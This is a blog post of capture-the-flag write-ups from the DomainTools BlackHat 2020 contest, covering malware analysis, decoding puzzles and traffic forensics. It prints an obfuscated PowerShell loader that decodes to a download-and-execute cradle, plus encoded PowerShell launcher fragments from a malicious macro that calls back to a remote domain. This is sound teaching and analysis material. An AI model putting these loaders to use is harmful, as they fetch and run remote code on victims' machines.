Monday, August 17, 2020

DomainTools CTF - BlackHat 2020

This year we participated in the BlackHat CTF challenge organized by DomainTools.

Our team Homeless took 8th place.



Write-ups

Flip It & Reverse It! (10)




Solution:

To solve this task we wrote the words in reverse order and got the following text:
domain tools rules!
This is the flag for the task.

Powershell Fun! (20)


Solution:

We checked the file content:

& ( $enV:comSPec[4,15,25]-joiN'')(NeW-ObjECT SySTem.io.CoMPResSIOn.dEFLateSTrEam([io.MeMORYSTReAM] [SySTem.CoNvERt]::FROmbaSe64STRIng( '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' ) , [SYStem.iO.coMPReSSIOn.COMPrESSIONMOde]::DEComPreSS) |foreAch-oBJEct{ NeW-ObjECT IO.sTreAMrEADeR($_, [SySTEm.tExT.ENcodiNg]::asCii)}| foReaCh-OBjEct {$_.rEAdTOend()} )

Then we decoded the highlighted (yellow) string with CyberChef (https://gchq.github.io/CyberChef) using the From Base64 and Raw Inflate operations.

After that we extracted the list of numbers from the following string:

87I114@105N116R101R45R72@111R115d116I32W39&83M118W32N120@88I120g32d34@104W116&116&34R59d105Z101R88I32Z40&110@101g119Z45I111g98I106@101g99W116N32@78W101&116N46@87W101d98Z67R108&105M101d110I116Z41d46N68R111@119d110N108d111g97N100I83W116Z114@105Z110W103M40&36W120&88N120&43N34R112W58&47N47R49M57d50d46@49M54g56d46g49&53Z50W46W49g50d57@34@43@34&109N34M43d34d97Z103R105g34g43N34N99Z34g41R39g32@45&70W111M114d101W103@114N111N117&110d100@67R111N108&111g114g32I71Z114I101&101Z110

and got the following:

87, 114, 105, 116, 101, 45, 72, 111, 115, 116, 32, 39, 83, 118, 32, 120, 88, 120, 32, 34, 104, 116, 116, 34, 59, 105, 101, 88, 32, 40, 110, 101, 119, 45, 111, 98, 106, 101, 99, 116, 32, 78, 101, 116, 46, 87, 101, 98, 67, 108, 105, 101, 110, 116, 41, 46, 68, 111, 119, 110, 108, 111, 97, 100, 83, 116, 114, 105, 110, 103, 40, 36, 120, 88, 120, 43, 34, 112, 58, 47, 47, 49, 57, 50, 46, 49, 54, 56, 46, 49, 53, 50, 46, 49, 50, 57, 34, 43, 34, 109, 34, 43, 34, 97, 103, 105, 34, 43, 34, 99, 34, 41, 39, 32, 45, 70, 111, 114, 101, 103, 114, 111, 117, 110, 100, 67, 111, 108, 111, 114, 32, 71, 114, 101, 101, 110

Then we converted the decimal values to text and got the URL, which is the flag.
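The three-stage decoding above (base64 + raw inflate, then pulling the decimal character codes out of the junk-separated string, then decimal to text) is easy to script. The following is an added example, not the team's tooling: the base64 blob from the original file is not reproduced in the write-up, so a stand-in stage-1 payload is constructed here by raw-deflating the number string itself; the number string is the one quoted above, unchanged.

```python
import base64
import re
import zlib

# The obfuscated number string exactly as it appears in the write-up.
STAGE2_BLOB = (
    "87I114@105N116R101R45R72@111R115d116I32W39&83M118W32N120@88I120g32d34@104W116"
    "&116&34R59d105Z101R88I32Z40&110@101g119Z45I111g98I106@101g99W116N32@78W101&116"
    "N46@87W101d98Z67R108&105M101d110I116Z41d46N68R111@119d110N108d111g97N100I83W116"
    "Z114@105Z110W103M40&36W120&88N120&43N34R112W58&47N47R49M57d50d46@49M54g56d46g49"
    "&53Z50W46W49g50d57@34@43@34&109N34M43d34d97Z103R105g34g43N34N99Z34g41R39g32@45"
    "&70W111M114d101W103@114N111N117&110d100@67R111N108&111g114g32I71Z114I101&101Z110"
)


def base64_raw_inflate(b64):
    """Stage 1: the loader feeds a base64 string to DeflateStream in Decompress
    mode, i.e. a raw DEFLATE stream without a zlib header.  CyberChef's
    "Raw Inflate" is the same operation; in Python that is zlib with negative wbits."""
    raw = base64.b64decode(b64)
    return zlib.decompress(raw, wbits=-zlib.MAX_WBITS).decode("ascii")


def extract_numbers(junk_separated):
    """Stage 2: the command is hidden as decimal character codes separated by
    arbitrary junk characters (I, @, N, R, d, W, &, M, g, Z ...).  Splitting on
    every run of non-digits recovers the codes whatever separators were used."""
    return [int(tok) for tok in re.split(r"[^0-9]+", junk_separated) if tok]


def numbers_to_text(codes):
    """Stage 3: decimal character codes back to text."""
    return "".join(chr(c) for c in codes)


def make_sample_stage1(script):
    """CONSTRUCTED stand-in for the base64 blob the write-up does not reproduce:
    raw-deflate + base64 of whatever script text we are given."""
    comp = zlib.compressobj(wbits=-zlib.MAX_WBITS)
    data = comp.compress(script.encode("ascii")) + comp.flush()
    return base64.b64encode(data).decode("ascii")


def decode_loader(stage1_b64):
    """Run all three stages on a stage-1 payload and return the final command."""
    stage2 = base64_raw_inflate(stage1_b64)
    return numbers_to_text(extract_numbers(stage2))


if __name__ == "__main__":
    codes = extract_numbers(STAGE2_BLOB)
    print(len(codes), "character codes")
    print(numbers_to_text(codes))
    # Same result through the full pipeline on the constructed stage-1 sample.
    print(decode_loader(make_sample_stage1(STAGE2_BLOB)))
```

Splitting on non-digit runs is deliberately more general than the specific separator set seen here, so the same function handles variants of this trick that rotate the junk characters.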

Keylogging is Fun (25)



Solution:

We used scdbg to solve this task: after running it we checked the result of the shellcode emulation and got the path "C:\Windows\Temp\log.bin".

Messy JS! (30)



Solution:

We just pasted it into the form on the site, and after execution we got the flag.


You've Been Pwn3d (30)



Solution:

We used ltrace, which intercepts and records the dynamic library calls made by an executed process and the signals it receives. The flag appeared in its output:

...
[pid 3001] inet_addr("127.0.0.1") = 0x100007f
[pid 3001] htons(1984, 0x7fc68146c950, 0x100007f, 0) = 0xc007
...

Flag: 1984
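The two ltrace lines above are enough to recover the socket endpoint without reading the rest of the trace, and the return values can be cross-checked against the arguments. This is an added example (not the team's tooling) that parses the quoted lines and confirms that 0x100007f is 127.0.0.1 in network byte order read on a little-endian host, and that 0xc007 is 1984 with its bytes swapped.

```python
import re
import socket
import struct

# The two lines quoted from the ltrace output in the write-up.
LTRACE_OUTPUT = """\
[pid 3001] inet_addr("127.0.0.1") = 0x100007f
[pid 3001] htons(1984, 0x7fc68146c950, 0x100007f, 0) = 0xc007
"""

INET_ADDR_RE = re.compile(r'inet_addr\("([^"]+)"\)\s*=\s*(0x[0-9a-fA-F]+)')
HTONS_RE = re.compile(r'htons\((\d+)[^)]*\)\s*=\s*(0x[0-9a-fA-F]+)')


def parse_ltrace(text):
    """Return (ip, port, inet_addr_return, htons_return) from an ltrace dump.
    Only the first htons argument is meaningful: htons() takes one parameter,
    the other values ltrace printed are just register contents."""
    ip = port = ip_ret = port_ret = None
    for line in text.splitlines():
        m = INET_ADDR_RE.search(line)
        if m:
            ip, ip_ret = m.group(1), int(m.group(2), 16)
            continue
        m = HTONS_RE.search(line)
        if m:
            port, port_ret = int(m.group(1)), int(m.group(2), 16)
    return ip, port, ip_ret, port_ret


def inet_addr_matches(ip, ret):
    """inet_addr() returns the address in network byte order; for 127.0.0.1
    the bytes 7f 00 00 01 read as a native little-endian integer are 0x100007f."""
    return struct.unpack("<I", socket.inet_aton(ip))[0] == ret


def htons_matches(port, ret):
    """htons(1984): 1984 = 0x07c0, byte-swapped = 0xc007."""
    return ((port & 0xFF) << 8) | (port >> 8) == ret


if __name__ == "__main__":
    ip, port, ip_ret, port_ret = parse_ltrace(LTRACE_OUTPUT)
    print(f"endpoint {ip}:{port}")
    print("inet_addr consistent:", inet_addr_matches(ip, ip_ret))
    print("htons consistent:", htons_matches(port, port_ret))
```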

Guess the Pass (40)


Solution:

After analyzing the strings in the binary, we discovered the following data:

...
encodeeJyzMNdRMDQwBBEWOgqWlkCGIZhnCRU3NdBRMDODyZtD1RiAtZlARAwNzQDKrwzB\nbase64
...

We used CyberChef to decode it and get the flag:


Flag: Welcome2Blackhat


Macho Madness (40)


Solution:

We examined the ZIP file in a deployed VM and got port 1337.

Flag: 1337

Doggo Secrets (10)


Solution:

After extracting the archive we got the file oh_hi.gpj.
We changed the extension to .jpg and opened it in an image viewer; the image contained the flag DT_CTF_123!@#.

Flag: DT_CTF_123!@#

Noise To Signal (20)



Solution:


We used a text analyzer to look for human-readable words.

After several minutes of searching we discovered the word phisheye, which was the flag.

Flag: phisheye

Sweet logo, dude! (20)



Solution:

First we unzipped the file (logo.jpg was actually an archive) and got the file hmmm.txt with the following text:

FKWcp1W1oTImZGVm

Then we tried different ways to decode it and finally got the flag:


Flag: IrisRules123
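The write-up does not say which decoding finally worked. As an added example (not the team's own tooling), the script below tries a few common chains against the string from hmmm.txt and keeps only the results that are printable ASCII; ROT13 followed by base64 is the chain that yields the flag quoted above, because the string is base64 text whose letters were rotated.

```python
import base64
import codecs

HMMM_TXT = "FKWcp1W1oTImZGVm"  # the string from hmmm.txt in the write-up


def as_printable(raw):
    """Return the bytes as text only if they are printable ASCII, else None."""
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


# Candidate decoding chains, each mapping the input string to bytes.
CANDIDATE_CHAINS = {
    "base64": lambda s: base64.b64decode(s, validate=True),
    "rot13 -> base64": lambda s: base64.b64decode(codecs.encode(s, "rot_13"), validate=True),
    "base64 -> rot13": lambda s: codecs.encode(
        base64.b64decode(s, validate=True).decode("ascii"), "rot_13").encode("ascii"),
    "hex": lambda s: bytes.fromhex(s),
    "base32": lambda s: base64.b32decode(s),
}


def try_chains(s):
    """Apply every chain; keep the ones that decode cleanly to printable text.
    binascii.Error and UnicodeDecodeError are both ValueError subclasses."""
    results = {}
    for name, fn in CANDIDATE_CHAINS.items():
        try:
            out = as_printable(fn(s))
        except ValueError:
            out = None
        if out is not None:
            results[name] = out
    return results


if __name__ == "__main__":
    for name, text in try_chains(HMMM_TXT).items():
        print(f"{name}: {text}")
```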

Hack the Hacker (25)




Solution:

We used Wireshark to solve the task. We checked the internal traffic and discovered the IP address that brute-forced 192.168.152.135.
Finally we got the flag from the Basic auth header:

Authorization: Basic emVyb2Nvb2w6aGFja2Vy, which base64-decodes to zerocool:hacker.

Flag: hacker
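Basic authentication over plain HTTP puts the credentials in every request, so a capture of a brute-force attempt shows each guess followed by the server's verdict. The following added example (not the team's tooling) walks a follow-the-stream style dump, decodes each Authorization header and pairs it with the status code of the response that follows; the dump is constructed for this example, and only its final header is the one quoted from the capture above.

```python
import base64
import re

# CONSTRUCTED excerpt of an HTTP stream: two failed guesses, then the
# Authorization header quoted in the write-up, accepted by the server.
CAPTURE = """\
GET /admin HTTP/1.1
Host: 192.168.152.135
Authorization: Basic emVyb2Nvb2w6MTIzNDU2

HTTP/1.1 401 Unauthorized
WWW-Authenticate: Basic realm="admin"

GET /admin HTTP/1.1
Host: 192.168.152.135
Authorization: Basic emVyb2Nvb2w6YWRtaW4=

HTTP/1.1 401 Unauthorized
WWW-Authenticate: Basic realm="admin"

GET /admin HTTP/1.1
Host: 192.168.152.135
Authorization: Basic emVyb2Nvb2w6aGFja2Vy

HTTP/1.1 200 OK
Content-Type: text/html
"""

AUTH_RE = re.compile(r"Authorization:\s*Basic\s+(\S+)", re.I)
STATUS_RE = re.compile(r"HTTP/\d\.\d\s+(\d{3})")


def basic_auth_attempts(stream):
    """Return (username, password, status) for every Basic-auth request,
    using the status line of the response that follows it."""
    attempts = []
    pending = None
    for line in stream.splitlines():
        m = AUTH_RE.match(line)
        if m:
            # RFC 7617: base64 of "user:password"; the password may contain ':'
            # so split only on the first one.
            user, _, pwd = base64.b64decode(m.group(1)).decode("latin-1").partition(":")
            pending = (user, pwd)
            continue
        m = STATUS_RE.match(line)
        if m and pending is not None:
            attempts.append((pending[0], pending[1], int(m.group(1))))
            pending = None
    return attempts


def successful_credentials(stream):
    """The credential pairs the server accepted: a run of 401s ending in a
    200 from the same client is the brute-force signature to look for."""
    return [(u, p) for u, p, status in basic_auth_attempts(stream) if status == 200]


if __name__ == "__main__":
    for user, pwd, status in basic_auth_attempts(CAPTURE):
        print(f"{status} {user}:{pwd}")
    print("accepted:", successful_credentials(CAPTURE))
```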

Hire the Hacker (30)



Solution:

First we renamed DadeResume.docm to DadeResume.zip.
Then we examined vbaProject.bin with olevba and found some embedded PowerShell code:

...
cxn = "powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVg"
cxn = cxn + "BlAHIAUwBpAE8AbgBUAGEAYgBsAEUALgBQAFMAVgBFAFIAcwBp"
cxn = cxn + "AG8AbgAuAE0AQQBqAG8AUgAgAC0ARwBlACAAMwApAHsAJABkAD"
cxn = cxn + "MAOQA4ADIAPQBbAFIAZQBGAF0ALgBBAFMAcwBlAG0AQgBsAHkA"
...

We concatenated the cxn fragments into one string and base64-decoded it.
The result contained several more encoded strings; after base64-decoding them we got the flag:

aAB0AHQAcAA6AC8ALwBzAHUAcABlAHIAcwBlAGsAcgBlAHQAZABvAG0AYQBpAG4ALgBuAGUAdAA6ADYANgA2ADYA  -> http://supersekretdomain.net:6666

Flag: supersekretdomain.net

RIP Your E-Commerce Website (40)



Solution:


After deobfuscating the JS code and several minutes of analysis, we got the flag.

Flag: http://domaintoolsctf.com/checkout/form.js

SHA1 is dead, long live SHA1! (10)


Solution:

This task was really easy: we just used sha1-online.com.


Data Blob in the Log! (10)



Solution:

We used ROT13 decoding to get the flag.

Flag: iris!

DB Pwn3d! (20)




Solution:

We used an online MD5 reverse-lookup ("decrypt") tool.


Flag: Password123


Get XOR'd! (20)




Solution:

We used CyberChef to decrypt it:

Flag: HACKTHEPLANET